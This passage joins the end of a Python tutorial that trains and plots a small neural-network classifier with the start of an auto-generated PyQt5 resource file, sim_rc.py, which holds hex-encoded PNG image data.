model.append_layer(Linear(in_features=128, out_features=64))
model.append_layer(ReLU())
model.append_layer(Linear(in_features=64, out_features=10))
model.append_layer(SoftMax())
```
## Model compile:
```py
batch_size = 16
model.compile(optimizer=Adam(learning_rate=5e-3, mu=0.98, rho=0.999), loss=CrossEntropyLoss(),
batch_size=batch_size, metrics=['accuracy'])
```
## Model training:
```py
epochs = 25
history = model.fit(x_train=train_images, y_train=train_labels, x_val=val_images, y_val=val_labels, epochs=epochs)
```
## Model performance:
```py
plt.plot(history['accuracy'])
plt.plot(history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'val'], loc='upper left')
plt.show()
``` | PypiClean |
/DataShow-6.10.1-py3-none-any.whl/DataReplay/ui/sim_rc.py |
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x2f\xe6\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\xce\x00\x00\x00\x90\x08\x06\x00\x00\x00\x40\x9b\x54\x43\
\x00\x00\x0c\x5f\x69\x43\x43\x50\x49\x43\x43\x20\x50\x72\x6f\x66\
\x69\x6c\x65\x00\x00\x48\x89\x95\x97\x07\x58\x93\x49\x13\x80\xf7\
\x2b\xa9\x24\xb4\x40\x04\xa4\x84\xde\x44\xe9\x04\x90\x12\x42\x8b\
\x20\x20\x55\x10\x95\x90\x04\x12\x4a\x8c\x09\x41\xc5\x8e\x1e\x2a\
\x78\x76\x11\xc5\x8a\x15\x51\xf4\xf4\x04\xe4\xac\x88\xdd\x43\xb1\
\xf7\xc3\x82\x8a\x72\x1e\x9e\x62\x43\xe5\xdf\x90\x80\x9e\xfe\xe5\
\xf9\xe7\x79\xf6\xdb\x37\xb3\xb3\xb3\x33\x93\xdd\xe4\x5b\x00\x74\
\xda\xf8\x32\x59\x1e\xaa\x0b\x40\xbe\xb4\x40\x1e\x1f\x11\xc2\x1a\
\x9d\x9a\xc6\x22\xb5\x03\x04\x98\x00\x0a\x30\x06\x7a\x7c\x81\x42\
\xc6\x89\x8b\x8b\x06\x50\xfa\xfb\x7f\xca\xdb\xeb\xd0\x1a\xca\x15\
\x17\x95\xaf\x1f\xc7\xff\xab\xe8\x0b\x45\x0a\x01\x00\x48\x3a\xe4\
\x4c\xa1\x42\x90\x0f\xf9\x18\x00\x78\xb1\x40\x26\x2f\x00\x80\x18\
\x0a\xf5\xd6\x93\x0a\x64\x2a\x16\x43\x36\x90\xc3\x00\x21\x4f\x53\
\x71\xb6\x9a\x97\xa8\x38\x53\xcd\x5b\xfa\x6c\x12\xe3\xb9\x90\x1b\
\x00\x20\xd3\xf8\x7c\x79\x36\x00\xda\xcd\x50\xcf\x2a\x14\x64\x43\
\x3f\xda\x8f\x21\xbb\x4a\x85\x12\x29\x00\x3a\x06\x90\x03\x05\x62\
\xbe\x10\x72\x22\xe4\x21\xf9\xf9\x13\x54\x3c\x0b\xb2\x03\xb4\x97\
\x41\xde\x01\x99\x9d\xf9\x8d\xcf\xec\x7f\xf8\xcf\x1c\xf0\xcf\xe7\
\x67\x0f\xb0\x3a\xaf\x3e\x21\x87\x4a\x14\xb2\x3c\xfe\x94\xff\xb3\
\x34\xff\x5b\xf2\xf3\x94\xfd\x6b\xd8\xc1\x46\x13\xcb\x23\xe3\x55\
\xf9\xc3\x1a\xde\xcc\x9d\x10\xa5\x62\x1a\xe4\x4e\x69\x66\x4c\xac\
\xaa\xd6\x90\xdf\x4b\x84\xea\xba\x03\x80\x52\xc5\xca\xc8\x24\xb5\
\x3d\x6a\x2a\x50\x70\x61\xfd\x00\x13\xb2\xab\x90\x1f\x1a\x05\xd9\
\x14\x72\xb8\x34\x2f\x26\x5a\xa3\xcf\xcc\x92\x84\xf3\x20\xc3\xdd\
\x82\x4e\x96\x14\xf0\x12\x35\x73\xe7\x8b\x14\x61\x09\x1a\x9f\x6b\
\xe5\x13\xe2\x63\xfb\x39\x4b\xce\xe5\x68\xe6\xd6\xf2\xe5\x7d\xeb\
\xaa\xec\x9b\x95\xb9\x49\x1c\x8d\xff\x9b\x62\x11\xaf\xdf\xff\x9b\
\x22\x71\x62\x0a\x64\x2a\x00\x18\xb5\x50\x92\x1c\x03\x59\x1b\xb2\
\x81\x22\x37\x21\x4a\x6d\x83\x59\x15\x89\xb9\x31\xfd\x36\x72\x65\
\xbc\x2a\x7e\x1b\xc8\x6c\x91\x34\x22\x44\xed\x1f\x4b\xcf\x92\x87\
\xc7\x6b\xec\x65\xf9\x8a\xfe\x7c\xb1\x12\xb1\x84\x17\xa3\xe1\x8a\
\x02\x71\x62\xa4\xba\x3e\xd8\x4e\x01\xbf\x2f\x7e\x23\xc8\x75\x22\
\x29\x27\xa9\xdf\x8f\x48\x31\x3a\xba\x3f\x17\xa1\x28\x34\x4c\x9d\
\x3b\xd6\x22\x92\x26\x69\xf2\xc5\xee\xcb\x0a\x42\xe2\x35\x73\xbb\
\x64\x79\x71\x1a\x7b\x9c\x2c\xca\x8b\x50\xe9\xad\x20\x9b\x28\x0a\
\x13\x34\x73\xf1\xe1\x05\x70\x73\xaa\xfd\xe3\xd1\xb2\x82\xb8\x44\
\x75\x9c\x78\x46\x0e\x7f\x44\x9c\x3a\x1e\xbc\x10\x44\x03\x2e\x08\
\x05\x2c\xa0\x84\x2d\x13\x4c\x00\x39\x40\xd2\xd2\x59\xdf\x09\x3f\
\xa9\x47\xc2\x01\x1f\xc8\x41\x36\x10\x01\x17\x8d\xa6\x7f\x46\x4a\
\xdf\x88\x14\x3e\x13\x40\x11\xf8\x13\x92\x08\x28\x06\xe6\x85\xf4\
\x8d\x8a\x40\x21\xd4\x7f\x1e\xd0\xaa\x9f\x2e\x20\xab\x6f\xb4\xb0\
\x6f\x46\x2e\x78\x02\x39\x1f\x44\x81\x3c\xf8\x59\xd9\x37\x4b\x3a\
\xb0\x5a\x32\x78\x0c\x35\x92\x1f\x56\x17\xc0\x58\xf3\x60\x53\x8d\
\xfd\xa8\xe3\x40\x4d\xb4\x46\xa3\xec\xf7\xcb\xd2\xe9\xb7\x24\x86\
\x11\x43\x89\x91\xc4\x70\xa2\x23\x6e\x82\x07\xe2\xfe\x78\x34\x7c\
\x06\xc3\xe6\x8e\xb3\x71\xdf\xfe\x68\xbf\xda\x13\x9e\x10\x5a\x09\
\x0f\x09\xd7\x08\x6d\x84\x5b\xe3\x25\xc5\xf2\xef\x62\x19\x09\xda\
\xa0\xff\x70\x4d\xc6\x99\xdf\x66\x8c\xdb\x41\x9f\x5e\x78\x08\x1e\
\x00\xbd\x43\xcf\x38\x13\x37\x01\x2e\xb8\x27\x5c\x87\x83\x07\xc1\
\x95\xbd\xa0\x96\xab\x89\x5b\x95\x3b\xeb\xdf\xe4\x39\x90\xc1\x37\
\x35\xd7\xd8\x51\x5c\x29\x28\x65\x10\x25\x98\xe2\xf0\xfd\x4c\x6d\
\x27\x6d\xaf\x01\x2f\xaa\x8a\x7e\x5b\x1f\x75\xac\x99\x03\x55\xe5\
\x0e\x8c\x7c\xbf\x3e\xf7\x9b\x3a\x0b\x61\x1f\xf5\xbd\x25\x36\x1f\
\xdb\x8f\x9d\xc6\x8e\x63\x67\xb1\x43\x58\x3d\x60\x61\x47\xb1\x06\
\xec\x02\x76\x58\xc5\x03\x7b\xe8\x71\xdf\x1e\xea\x5f\x2d\xbe\x2f\
\x9e\x5c\xe8\x47\xf2\xc3\x7a\x7c\xcd\x9a\xaa\x4a\x2a\x5c\x6b\x5c\
\x3b\x5c\x3f\x69\xc6\x40\x81\x68\x72\x81\xea\x80\x71\x27\xc8\xa6\
\xc8\x25\xd9\xe2\x02\x16\x07\xfe\x0b\x88\x58\x3c\xa9\x60\xe8\x10\
\x96\xbb\xab\xbb\x1b\x00\xaa\xff\x14\xf5\xcf\xd4\x6b\x66\xdf\x7f\
\x05\xc2\x3c\xf7\x55\x97\xfb\x0a\x00\xef\x5b\xf0\x8c\x09\xbf\xea\
\x84\x4b\x01\x38\x68\x02\x8f\x92\xc3\x57\x9d\x1d\x3c\x2b\xba\x74\
\x00\x8e\x6c\x12\x28\xe5\x85\x6a\x1d\xae\x7a\x10\xe0\xaf\x81\x0e\
\x3c\x51\xc6\xc0\x1c\x58\x03\x07\x98\x91\x3b\xf0\x06\xfe\x20\x18\
\x84\x81\x11\x20\x16\x24\x82\x54\x30\x0e\xd6\x59\x0c\xf7\xb3\x1c\
\x4c\x02\xd3\xc0\x6c\x50\x02\xca\xc0\x12\xb0\x12\xac\x01\x1b\xc0\
\x66\xb0\x03\xec\x06\xfb\x40\x3d\x38\x04\x8e\x83\x53\xe0\x3c\xb8\
\x04\xae\x81\x3b\x70\xff\xb4\x83\x17\xa0\x0b\xbc\x05\x3d\x08\x82\
\x90\x10\x3a\xc2\x40\x8c\x11\x0b\xc4\x16\x71\x46\xdc\x11\x36\x12\
\x88\x84\x21\xd1\x48\x3c\x92\x8a\x64\x20\xd9\x88\x14\x51\x22\xd3\
\x90\x39\x48\x19\xb2\x0c\x59\x83\x6c\x42\xaa\x91\x5f\x90\x83\xc8\
\x71\xe4\x2c\xd2\x8a\xdc\x42\x1e\x20\x1d\xc8\xdf\xc8\x47\x14\x43\
\x69\xa8\x01\x6a\x86\xda\xa1\xc3\x50\x36\xca\x41\xa3\xd0\x44\x74\
\x2c\x9a\x8d\x4e\x44\x8b\xd0\xb9\xe8\x22\xb4\x02\xad\x42\x77\xa1\
\x75\xe8\x71\xf4\x3c\x7a\x0d\x6d\x43\x5f\xa0\xdd\x18\xc0\xb4\x30\
\x26\x66\x89\xb9\x60\x6c\x8c\x8b\xc5\x62\x69\x58\x16\x26\xc7\x66\
\x60\xa5\x58\x39\x56\x85\xd5\x62\x8d\xf0\x9b\xbe\x82\xb5\x61\x9d\
\xd8\x07\x9c\x88\x33\x70\x16\xee\x02\xf7\x70\x24\x9e\x84\x0b\xf0\
\x89\xf8\x0c\x7c\x21\xbe\x06\xdf\x81\xd7\xe1\xcd\xf8\x15\xfc\x01\
\xde\x85\x7f\x21\xd0\x09\xa6\x04\x67\x82\x1f\x81\x47\x18\x4d\xc8\
\x26\x4c\x22\x94\x10\xca\x09\xdb\x08\x07\x08\x27\xe1\x69\x6a\x27\
\xbc\x25\x12\x89\x4c\xa2\x3d\xd1\x07\x9e\xc6\x54\x62\x0e\x71\x2a\
\x71\x21\x71\x1d\x71\x0f\xf1\x18\xb1\x95\xf8\x88\xd8\x4d\x22\x91\
\x8c\x49\xce\xa4\x00\x52\x2c\x89\x4f\x2a\x20\x95\x90\x56\x93\x76\
\x91\x8e\x92\x2e\x93\xda\x49\xef\xc9\x5a\x64\x0b\xb2\x3b\x39\x9c\
\x9c\x46\x96\x92\x8b\xc9\xe5\xe4\x9d\xe4\x23\xe4\xcb\xe4\xa7\xe4\
\x1e\x8a\x2e\xc5\x96\xe2\x47\x89\xa5\x08\x29\x53\x28\x8b\x29\x5b\
\x28\x8d\x94\x8b\x94\x76\x4a\x0f\x55\x8f\x6a\x4f\x0d\xa0\x26\x52\
\x73\xa8\xb3\xa9\x15\xd4\x5a\xea\x49\xea\x5d\xea\x6b\x2d\x2d\x2d\
\x2b\x2d\x5f\xad\x51\x5a\x12\xad\x59\x5a\x15\x5a\x7b\xb5\xce\x68\
\x3d\xd0\xfa\x40\xd3\xa7\x39\xd1\xb8\xb4\x74\x9a\x92\xb6\x88\xb6\
\x9d\x76\x8c\x76\x8b\xf6\x9a\x4e\xa7\xdb\xd1\x83\xe9\x69\xf4\x02\
\xfa\x22\x7a\x35\xfd\x04\xfd\x3e\xfd\xbd\x36\x43\x7b\xa8\x36\x4f\
\x5b\xa8\x3d\x53\xbb\x52\xbb\x4e\xfb\xb2\xf6\x4b\x1d\x8a\x8e\xad\
\x0e\x47\x67\x9c\x4e\x91\x4e\xb9\xce\x7e\x9d\x8b\x3a\x9d\xba\x14\
\x5d\x3b\x5d\xae\x2e\x5f\x77\x86\x6e\xa5\xee\x41\xdd\x1b\xba\xdd\
\x7a\x0c\x3d\x37\xbd\x58\xbd\x7c\xbd\x85\x7a\x3b\xf5\xce\xea\x3d\
\xd3\x27\xe9\xdb\xe9\x87\xe9\x0b\xf5\xe7\xea\x6f\xd6\x3f\xa1\xff\
\x88\x81\x31\xac\x19\x5c\x86\x80\x31\x87\xb1\x85\x71\x92\xd1\x6e\
\x40\x34\xb0\x37\xe0\x19\xe4\x18\x94\x19\xec\x36\x68\x31\xe8\x32\
\xd4\x37\xf4\x34\x4c\x36\x9c\x6c\x58\x69\x78\xd8\xb0\x8d\x89\x31\
\xed\x98\x3c\x66\x1e\x73\x31\x73\x1f\xf3\x3a\xf3\xe3\x20\xb3\x41\
\x9c\x41\xa2\x41\x0b\x06\xd5\x0e\xba\x3c\xe8\x9d\xd1\x60\xa3\x60\
\x23\x91\x51\xa9\xd1\x1e\xa3\x6b\x46\x1f\x8d\x59\xc6\x61\xc6\xb9\
\xc6\x4b\x8d\xeb\x8d\xef\x99\xe0\x26\x4e\x26\xa3\x4c\x26\x99\xac\
\x37\x39\x69\xd2\x39\xd8\x60\xb0\xff\x60\xc1\xe0\xd2\xc1\xfb\x06\
\xdf\x36\x45\x4d\x9d\x4c\xe3\x4d\xa7\x9a\x6e\x36\xbd\x60\xda\x6d\
\x66\x6e\x16\x61\x26\x33\x5b\x6d\x76\xc2\xac\xd3\x9c\x69\x1e\x6c\
\x9e\x63\xbe\xc2\xfc\x88\x79\x87\x05\xc3\x22\xd0\x42\x62\xb1\xc2\
\xe2\xa8\xc5\x73\x96\x21\x8b\xc3\xca\x63\x55\xb0\x9a\x59\x5d\x96\
\xa6\x96\x91\x96\x4a\xcb\x4d\x96\x2d\x96\x3d\x56\xf6\x56\x49\x56\
\xc5\x56\x7b\xac\xee\x59\x53\xad\xd9\xd6\x59\xd6\x2b\xac\x9b\xac\
\xbb\x6c\x2c\x6c\x46\xda\x4c\xb3\xa9\xb1\xb9\x6d\x4b\xb1\x65\xdb\
\x8a\x6d\x57\xd9\x9e\xb6\x7d\x67\x67\x6f\x97\x62\x37\xcf\xae\xde\
\xee\x99\xbd\x91\x3d\xcf\xbe\xc8\xbe\xc6\xfe\xae\x03\xdd\x21\xc8\
\x61\xa2\x43\x95\xc3\x55\x47\xa2\x23\xdb\x31\xd7\x71\x9d\xe3\x25\
\x27\xd4\xc9\xcb\x49\xec\x54\xe9\x74\xd1\x19\x75\xf6\x76\x96\x38\
\xaf\x73\x6e\x1d\x42\x18\xe2\x3b\x44\x3a\xa4\x6a\xc8\x0d\x17\x9a\
\x0b\xc7\xa5\xd0\xa5\xc6\xe5\xc1\x50\xe6\xd0\xe8\xa1\xc5\x43\xeb\
\x87\xbe\x1c\x66\x33\x2c\x6d\xd8\xd2\x61\xa7\x87\x7d\x71\xf5\x72\
\xcd\x73\xdd\xe2\x7a\xc7\x4d\xdf\x6d\x84\x5b\xb1\x5b\xa3\xdb\xdf\
\xee\x4e\xee\x02\xf7\x4a\xf7\xab\x1e\x74\x8f\x70\x8f\x99\x1e\x0d\
\x1e\xaf\x3c\x9d\x3d\x45\x9e\xeb\x3d\x6f\x7a\x31\xbc\x46\x7a\xcd\
\xf3\x6a\xf2\xfa\xec\xed\xe3\x2d\xf7\xae\xf5\xee\xf0\xb1\xf1\xc9\
\xf0\x59\xeb\x73\x83\x6d\xc0\x8e\x63\x2f\x64\x9f\xf1\x25\xf8\x86\
\xf8\xce\xf4\x3d\xe4\xfb\xc1\xcf\xdb\xaf\xc0\x6f\x9f\xdf\x5f\xfe\
\x2e\xfe\xb9\xfe\x3b\xfd\x9f\x0d\xb7\x1f\x2e\x1a\xbe\x65\xf8\xa3\
\x00\xab\x00\x7e\xc0\xa6\x80\xb6\x40\x56\x60\x46\xe0\xc6\xc0\xb6\
\x20\xcb\x20\x7e\x50\x55\xd0\xc3\x60\xeb\x60\x61\xf0\xb6\xe0\xa7\
\x1c\x47\x4e\x0e\x67\x17\xe7\x65\x88\x6b\x88\x3c\xe4\x40\xc8\x3b\
\xae\x1f\x77\x3a\xf7\x58\x28\x16\x1a\x11\x5a\x1a\xda\x12\xa6\x1f\
\x96\x14\xb6\x26\xec\x7e\xb8\x55\x78\x76\x78\x4d\x78\x57\x84\x57\
\xc4\xd4\x88\x63\x91\x84\xc8\xa8\xc8\xa5\x91\x37\x78\x66\x3c\x01\
\xaf\x9a\xd7\x35\xc2\x67\xc4\xf4\x11\xcd\x51\xb4\xa8\x84\xa8\x35\
\x51\x0f\xa3\x9d\xa2\xe5\xd1\x8d\x23\xd1\x91\x23\x46\x2e\x1f\x79\
\x37\xc6\x36\x46\x1a\x53\x1f\x0b\x62\x79\xb1\xcb\x63\xef\xc5\xd9\
\xc7\x4d\x8c\xfb\x6d\x14\x71\x54\xdc\xa8\xca\x51\x4f\xe2\xdd\xe2\
\xa7\xc5\x9f\x4e\x60\x24\x8c\x4f\xd8\x99\xf0\x36\x31\x24\x71\x71\
\xe2\x9d\x24\x87\x24\x65\x52\x53\xb2\x4e\x72\x7a\x72\x75\xf2\xbb\
\x94\xd0\x94\x65\x29\x6d\xa3\x87\x8d\x9e\x3e\xfa\x7c\xaa\x49\xaa\
\x24\xb5\x21\x8d\x94\x96\x9c\xb6\x2d\xad\x7b\x4c\xd8\x98\x95\x63\
\xda\xd3\xbd\xd2\x4b\xd2\xaf\x8f\xb5\x1f\x3b\x79\xec\xd9\x71\x26\
\xe3\xf2\xc6\x1d\x1e\xaf\x33\x9e\x3f\x7e\x7f\x06\x21\x23\x25\x63\
\x67\xc6\x27\x7e\x2c\xbf\x8a\xdf\x9d\xc9\xcb\x5c\x9b\xd9\x25\xe0\
\x0a\x56\x09\x5e\x08\x83\x85\x2b\x84\x1d\xa2\x00\xd1\x32\xd1\xd3\
\xac\x80\xac\x65\x59\xcf\xb2\x03\xb2\x97\x67\x77\x88\x83\xc4\xe5\
\xe2\x4e\x09\x57\xb2\x46\xf2\x2a\x27\x32\x67\x43\xce\xbb\xdc\xd8\
\xdc\xed\xb9\xbd\x79\x29\x79\x7b\xf2\xc9\xf9\x19\xf9\x07\xa5\xfa\
\xd2\x5c\x69\xf3\x04\xf3\x09\x93\x27\xb4\xca\x9c\x65\x25\xb2\xb6\
\x89\x7e\x13\x57\x4e\xec\x92\x47\xc9\xb7\x29\x10\xc5\x58\x45\x43\
\x81\x01\x7c\x79\xbf\xa0\x74\x50\xfe\xa4\x7c\x50\x18\x58\x58\x59\
\xf8\x7e\x52\xf2\xa4\xfd\x93\xf5\x26\x4b\x27\x5f\x98\xe2\x34\x65\
\xc1\x94\xa7\x45\xe1\x45\x5b\xa7\xe2\x53\x05\x53\x9b\xa6\x59\x4e\
\x9b\x3d\xed\xc1\x74\xce\xf4\x4d\x33\x90\x19\x99\x33\x9a\x66\x5a\
\xcf\x9c\x3b\xb3\x7d\x56\xc4\xac\x1d\xb3\xa9\xb3\x73\x67\xff\x5e\
\xec\x5a\xbc\xac\xf8\xcd\x9c\x94\x39\x8d\x73\xcd\xe6\xce\x9a\xfb\
\xe8\xa7\x88\x9f\x6a\x4a\xb4\x4b\xe4\x25\x37\xe6\xf9\xcf\xdb\x30\
\x1f\x9f\x2f\x99\xdf\xb2\xc0\x63\xc1\xea\x05\x5f\x4a\x85\xa5\xe7\
\xca\x5c\xcb\xca\xcb\x3e\x2d\x14\x2c\x3c\xf7\xb3\xdb\xcf\x15\x3f\
\xf7\x2e\xca\x5a\xd4\xb2\xd8\x7b\xf1\xfa\x25\xc4\x25\xd2\x25\xd7\
\x97\x06\x2d\xdd\xb1\x4c\x6f\x59\xd1\xb2\x47\xcb\x47\x2e\xaf\x5b\
\xc1\x5a\x51\xba\xe2\xcd\xca\xf1\x2b\xcf\x96\x7b\x96\x6f\x58\x45\
\x5d\xa5\x5c\xd5\x56\x11\x5d\xd1\xb0\xda\x66\xf5\x92\xd5\x9f\xd6\
\x88\xd7\x5c\xab\x0c\xa9\xdc\xb3\xd6\x74\xed\x82\xb5\xef\xd6\x09\
\xd7\x5d\x5e\x1f\xbc\xbe\x76\x83\xd9\x86\xb2\x0d\x1f\x37\x4a\x36\
\xde\xdc\x14\xb1\xa9\xae\xca\xae\xaa\x7c\x33\x71\x73\xe1\xe6\x27\
\x5b\x92\xb7\x9c\xde\xca\xde\x5a\xbd\xcd\x64\x5b\xd9\xb6\xcf\xdb\
\xa5\xdb\xdb\x76\xc4\xef\x68\xae\xf6\xa9\xae\xde\x69\xba\x73\x71\
\x0d\x5a\xa3\xac\xe9\xd8\x95\xbe\xeb\xd2\xee\xd0\xdd\x0d\xb5\x2e\
\xb5\x9b\xf6\x30\xf7\x94\xed\x05\x7b\x95\x7b\x9f\xff\x92\xf1\xcb\
\xf5\x7d\x51\xfb\x9a\xf6\xb3\xf7\xd7\xfe\x6a\xfb\xeb\xda\x03\x8c\
\x03\xa5\x75\x48\xdd\x94\xba\xae\x7a\x71\x7d\x5b\x43\x6a\x43\xeb\
\xc1\x11\x07\x9b\x1a\xfd\x1b\x0f\xfc\x36\xf4\xb7\xed\x87\x2c\x0f\
\x55\x1e\x36\x3c\xbc\xf8\x08\xf5\xc8\xdc\x23\xbd\x47\x8b\x8e\x76\
\x1f\x93\x1d\xeb\x3c\x9e\x7d\xfc\x51\xd3\xf8\xa6\x3b\x27\x46\x9f\
\xb8\xda\x3c\xaa\xb9\xe5\x64\xd4\xc9\x33\xa7\xc2\x4f\x9d\x38\xcd\
\x39\x7d\xf4\x4c\xc0\x99\x43\x67\xfd\xce\x1e\x3c\xc7\x3e\x57\x7f\
\xde\xfb\x7c\xdd\x05\xaf\x0b\x07\x7e\xf7\xfa\xfd\x40\x8b\x77\x4b\
\xdd\x45\x9f\x8b\x0d\x97\x7c\x2f\x35\xb6\x0e\x6f\x3d\x72\x39\xe8\
\xf2\xf1\x2b\xa1\x57\x4e\x5d\xe5\x5d\x3d\x7f\x2d\xe6\x5a\xeb\xf5\
\xa4\xeb\x37\x6f\xa4\xdf\x68\xbb\x29\xbc\xf9\xec\x56\xde\xad\x57\
\xb7\x0b\x6f\xf7\xdc\x99\x75\x97\x70\xb7\xf4\x9e\xee\xbd\xf2\xfb\
\xa6\xf7\xab\xfe\x70\xfc\x63\x4f\x9b\x77\xdb\xe1\x07\xa1\x0f\x2e\
\x3c\x4c\x78\x78\xe7\x91\xe0\xd1\x8b\xc7\x8a\xc7\x9f\xda\xe7\x3e\
\xa1\x3f\x29\x7f\x6a\xf1\xb4\xfa\x99\xfb\xb3\x43\x1d\xe1\x1d\x97\
\x9e\x8f\x79\xde\xfe\x42\xf6\xa2\xa7\xb3\xe4\x4f\xbd\x3f\xd7\xbe\
\x74\x78\xf9\xeb\x5f\xc1\x7f\x5d\xe8\x1a\xdd\xd5\xfe\x4a\xfe\xaa\
\xf7\xef\x85\xaf\x8d\x5f\x6f\x7f\xe3\xf9\xa6\xa9\x3b\xae\xfb\xfe\
\xdb\xfc\xb7\x3d\xef\x4a\xdf\x1b\xbf\xdf\xf1\x81\xfd\xe1\xf4\xc7\
\x94\x8f\x4f\x7b\x26\x7d\x22\x7d\xaa\xf8\xec\xf8\xb9\xf1\x4b\xd4\
\x97\xbb\xbd\xf9\xbd\xbd\x32\xbe\x9c\xdf\xf7\x2a\x80\xc1\x86\x66\
\x65\x01\xf0\xf7\x76\x00\xe8\xa9\x00\x30\x2e\xc1\x6b\xc2\x18\xf5\
\x9d\xaf\x4f\x10\xf5\x3d\xb5\x8f\xc0\x7f\x62\xf5\xbd\xb0\x4f\xbc\
\x01\xd8\x3a\x0b\x00\xd5\x75\x20\x16\xf6\xeb\x55\xef\x20\xb0\xd7\
\x09\x06\x40\xf5\xaa\x9e\x18\x0c\x50\x0f\x8f\x81\xa6\x11\x45\x96\
\x87\xbb\xda\x17\x0d\xde\x78\x08\xef\x7b\x7b\x5f\x9b\x01\x40\x6a\
\x04\xe0\xb3\xbc\xb7\xb7\x67\x5d\x6f\xef\x67\x78\x47\xc5\xe0\xfb\
\xce\xb1\x89\xea\xbb\xa6\x4a\x88\xf0\x6e\xb0\xd1\x57\x45\xd7\x3c\
\x0d\xc0\xf7\xa2\xbe\x87\x7e\x93\xe3\xf7\x3d\x50\x45\xe0\x09\xbe\
\xef\xff\x05\xfc\x06\x83\x7f\x16\x57\xfb\xf5\x00\x00\x00\x6c\x65\
\x58\x49\x66\x4d\x4d\x00\x2a\x00\x00\x00\x08\x00\x04\x01\x1a\x00\
\x05\x00\x00\x00\x01\x00\x00\x00\x3e\x01\x1b\x00\x05\x00\x00\x00\
\x01\x00\x00\x00\x46\x01\x28\x00\x03\x00\x00\x00\x01\x00\x02\x00\
\x00\x87\x69\x00\x04\x00\x00\x00\x01\x00\x00\x00\x4e\x00\x00\x00\
\x00\x00\x00\x00\x90\x00\x00\x00\x01\x00\x00\x00\x90\x00\x00\x00\
\x01\x00\x02\xa0\x02\x00\x04\x00\x00\x00\x01\x00\x00\x00\xce\xa0\
\x03\x00\x04\x00\x00\x00\x01\x00\x00\x00\x90\x00\x00\x00\x00\x5e\
\x26\xe7\x91\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x16\x25\x00\
\x00\x16\x25\x01\x49\x52\x24\xf0\x00\x00\x22\xb5\x49\x44\x41\x54\
\x78\x01\xed\x5d\x07\x9c\x15\xd5\xd5\x3f\xc8\x02\xdb\x1b\xcb\xc2\
\x2e\x6d\x97\xd0\x8b\x01\x29\x31\x09\x82\x68\x40\x05\xd4\xa0\x68\
\x7e\x16\x04\xd4\x0f\x0c\xa8\x91\xa8\x18\x34\x16\xd4\x28\x6a\x44\
\xb1\x22\x6a\x00\xdb\xa7\x10\x7e\xca\x07\x18\x01\x11\xf3\xe9\x27\
\xa8\x48\x31\xd2\xcb\x52\x76\x59\x60\x0b\xdb\x2b\xe5\x3b\xff\x91\
\xb7\xcc\xbb\x73\xe7\xed\x2b\x77\xde\x7b\xcb\xde\xf3\xfb\xbd\xdd\
\x99\x3b\x33\xb7\x9c\xb9\x67\x4e\xb9\xe7\x9e\xd3\x84\x18\x4e\x33\
\xe0\xbf\x06\x8d\x01\x8d\x01\xef\x30\x70\x9e\x77\xb7\xe9\xbb\x34\
\x06\x34\x06\xcc\x18\xd0\x84\x63\xc6\x86\x3e\xd6\x18\xf0\x12\x03\
\x9a\x70\xbc\x44\x94\xbe\x4d\x63\xc0\x8c\x01\x4d\x38\x66\x6c\xe8\
\x63\x8d\x01\x2f\x31\xa0\x09\xc7\x4b\x44\xe9\xdb\x34\x06\xcc\x18\
\xd0\x84\x63\xc6\x86\x3e\xd6\x18\xf0\x12\x03\x9a\x70\xbc\x44\x94\
\xbe\x4d\x63\xc0\x8c\x81\x08\xf3\x49\x43\x3d\x5e\x55\x50\x41\x59\
\x95\xb5\xb6\xdd\x2f\x3b\x71\x9a\xee\xcd\x48\xb4\xbd\xae\x2f\x68\
\x0c\xf8\x8a\x81\x06\x4d\x38\x25\x27\x4e\xd1\x7f\x6d\xcb\xa3\x45\
\x85\x15\x44\xe7\x35\xb1\x8e\xfd\xd4\x69\xfa\x55\x4c\x0b\x9a\xd7\
\x3d\xc5\x7a\x4d\x97\x68\x0c\x04\x80\x01\x63\xb6\x35\x44\xcf\x81\
\x5a\x76\x76\xb8\x6c\xd3\x11\xda\x50\x51\x43\x32\x79\xb3\x8a\x7d\
\x21\x26\xa4\x44\xd3\xdc\x1e\xad\x02\x40\x8f\x7e\x54\x63\x40\x8e\
\x01\xd9\x9c\x93\xdf\x19\x46\xa5\x85\xb5\xa7\x68\x24\x13\xcd\xbf\
\xcb\xab\xa5\x44\x53\xca\x44\xf5\x40\x7a\x9c\x41\x34\xda\x97\x28\
\x8c\x5e\xdc\x39\xd4\x95\x06\xc7\x71\xc0\x69\x7e\xb7\x31\x97\xb6\
\xd8\xe8\x34\x11\x3c\xa2\x77\xbb\xb7\xa2\x2b\x5a\x46\x9f\x43\xaf\
\x49\x0f\x25\xdc\x30\xd0\xa0\x38\x4e\x31\xeb\x34\xa3\x98\xd3\x7c\
\xcd\xe2\x99\x08\xa7\xb8\x20\xa9\x69\x13\x5a\xd2\x33\x55\x13\x8d\
\x88\x1c\x7d\xae\x1c\x03\x0d\x86\xe3\x9c\x64\x99\xeb\xea\x2d\x4c\
\x34\x65\xd5\x52\x24\x24\xb0\x71\x60\x4d\xdf\x34\xea\x1c\xdd\x4c\
\x7a\x5d\x17\x6a\x0c\xa8\xc4\x40\x83\xe0\x38\x20\x9a\x71\x5b\x8f\
\xd1\x8a\x92\x2a\xcb\xd8\xc1\x69\xd2\x22\x9a\xd2\xf2\xf3\xdb\x68\
\xa2\xb1\x60\x47\x17\x38\x85\x81\xb0\x37\x47\x43\xb9\x9f\xb6\x2b\
\x9f\x3e\x2d\xaa\x24\x70\x15\x11\x92\xb8\x6c\xf9\xf9\xad\xe9\x17\
\x9a\xd3\x88\xa8\xd1\xe7\x0e\x62\x20\xec\x39\xce\xc2\xc3\xa5\xf4\
\xfa\xb1\x32\x0b\x0a\xc0\x69\x92\x59\xa7\x59\xde\xa7\x8d\x26\x1a\
\x0b\x76\x74\x81\xd3\x18\x08\x6b\x1d\x07\x1e\x01\x63\x78\x81\xb3\
\x99\x95\xd1\x50\x74\x93\x26\xb4\xf2\x97\x6d\xa8\x4f\x6c\x73\xa7\
\x71\xa4\xeb\xd7\x18\xb0\x60\x20\x6c\x45\xb5\x9c\xea\x93\x34\x65\
\x57\x81\x94\x68\x8a\x79\x1d\xe7\x43\x16\xcf\x34\xd1\x58\xde\xa7\
